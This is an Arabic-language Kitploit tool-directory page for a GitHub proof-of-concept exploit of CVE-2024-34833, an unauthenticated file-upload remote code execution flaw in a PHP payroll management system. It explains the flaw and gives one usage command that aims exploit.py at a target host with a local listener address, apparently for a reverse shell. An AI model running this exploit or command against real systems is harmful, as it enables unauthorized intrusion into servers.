Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34833-payroll-management-system-rce | Kitploit
أدوات/GitHubGitHub/shellunease/cve-2024-34833-payroll-management-system-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubshellunease/cve-2024-34833-payroll-management-system-rce

CVE-2024-34833-payroll-management-system-rce

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

CVE-2024-34833 Payroll Management System RCE (بدون مصادقة) PoC

ثغرة RCE عبر رفع الملفات لـ https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. أسماء الملفات تسبقها طابع زمني بدقة دقيقة. يحاول السكربت تخمين اسم الملف باستخدام الطابع الزمني للدقيقة الحالية والدقيقة السابقة والدقيقة التالية.

وصف الثغرة

يسمح نظام إدارة الرواتب الإصدار 1.0 للمستخدمين برفع الصور عبر صفحة "save_settings". يمكن لمهاجم غير مصادق استغلال هذه الوظيفة لرفع ملف PHP خبيث بدلاً من ذلك. يتم تخزين الملفات المرفوعة في مجلد عام الوصول وتُضاف إلى أسمائها طابع زمني بدقة دقيقة يمكن حسابه بسهولة. يؤدي الاستغلال الناجح لهذه الثغرة إلى القدرة على تنفيذ كود عشوائي بصلاحية المستخدم الذي يشغّل خادم الويب.

مثال على الاستخدام

root@kitploit:~
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https

فيديو توضيحي

تنزيل الأداة